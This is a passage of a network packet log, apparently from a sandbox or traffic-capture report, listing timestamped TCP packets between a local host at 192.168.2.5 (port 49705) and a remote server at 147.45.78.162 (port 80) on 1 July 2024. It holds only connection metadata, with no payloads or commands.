Jul 1, 2024 13:02:14.178920031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.178934097 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.178970098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.179038048 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.179071903 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.179090023 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.179105043 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.179114103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.179138899 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.179147959 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.179177999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183537006 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183571100 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183593035 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183614016 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183620930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183669090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183722019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183756113 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183768988 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183789968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183792114 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183824062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.183829069 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.183871031 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188378096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188433886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188442945 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188472033 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188538074 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188653946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188687086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188694954 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188716888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188719988 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188736916 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188754082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.188762903 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.188796043 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197433949 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197448969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197464943 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197487116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197513103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197527885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197597027 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197612047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197628975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197637081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197657108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197675943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197767019 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197778940 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.197810888 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.197829962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199035883 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199070930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199083090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199112892 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199203968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199238062 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199261904 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199270010 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199278116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199305058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199318886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199340105 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.199351072 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.199383974 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205363035 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205398083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205426931 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205452919 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205526114 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205574036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205672979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205705881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205722094 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205761909 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205770969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205816984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205825090 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205858946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205866098 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205892086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205903053 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205928087 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205935001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.205981016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.205984116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206018925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206024885 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206052065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206068039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206087112 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206099987 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206120014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206130981 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206163883 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206171989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206202984 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206218004 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206235886 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206245899 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206270933 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206283092 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206304073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206315041 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206337929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206345081 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206373930 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.206377983 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.206413984 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208559990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208615065 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208623886 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208651066 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208661079 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208684921 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208687067 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208719969 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208724976 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208762884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208787918 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208821058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.208822012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.208862066 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211503983 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211538076 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211564064 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211570978 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211579084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211605072 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211617947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211638927 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211652994 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211673021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211684942 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211708069 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211720943 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211744070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.211754084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.211796045 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.213787079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.213839054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.213850021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.213859081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.213881016 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.213905096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.213931084 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.213999033 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.214010954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.214020967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.214031935 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.214040995 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.214080095 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.230743885 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.230783939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.230811119 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.230824947 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.230895996 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.230931044 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.230942011 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.230967045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.230976105 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231015921 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231055021 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231100082 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231174946 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231209993 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231228113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231251001 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231434107 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231481075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231496096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231523037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231530905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231575966 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231585979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231620073 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231633902 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231664896 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231671095 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231707096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231714964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231749058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.231852055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.231909037 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254626989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254693985 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254710913 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254748106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254759073 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254795074 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254802942 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254836082 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254846096 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254878044 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254889965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254926920 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.254941940 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.254971027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258598089 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258708000 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258712053 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258759975 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258769989 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258819103 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258824110 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258857965 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258867025 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258893967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258899927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258929014 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258935928 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.258963108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.258995056 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.259001970 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.262897968 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.262957096 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.262978077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.262991905 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.263006926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.263055086 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.263075113 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.263086081 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.263103008 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.263151884 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.263159037 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.263190031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.263210058 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.263252020 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.273286104 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273435116 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273488045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273519039 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.273523092 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273556948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273577929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.273608923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.273634911 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.273643017 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.274032116 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.278090000 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278208971 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278239012 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.278242111 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278306961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278316021 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.278341055 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278373957 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.278403997 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.278408051 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.279200077 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.283117056 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283169031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283196926 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.283224106 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283256054 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.283257961 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283308029 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.283394098 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283427954 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283458948 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.283463955 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.283518076 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290599108 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290693045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290740967 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290774107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290793896 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290827036 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290827990 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290860891 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290862083 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290895939 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.290918112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290918112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290982962 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.290993929 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.291481018 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.291995049 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292052031 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292084932 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292187929 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.292238951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292273045 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292325020 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292326927 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.292362928 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.292393923 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.292397976 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.293138027 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299200058 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299262047 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299299002 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299402952 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299422979 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299455881 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299468040 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299482107 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299489975 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299518108 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299525023 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299556971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299560070 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299593925 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299626112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299648046 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299680948 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299710989 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299715042 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299752951 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.299786091 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299961090 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.299988985 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300023079 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300056934 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300090075 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300092936 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.300124884 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300153971 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.300158024 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300193071 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300223112 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.300228119 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.300359964 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.302892923 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.302953959 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.302983999 CEST	49705	80	192.168.2.5	147.45.78.162
Jul 1, 2024 13:02:14.303009987 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.303062916 CEST	80	49705	147.45.78.162	192.168.2.5
Jul 1, 2024 13:02:14.303096056 CEST	80	49705	147.45.78.162	192.168.2.5
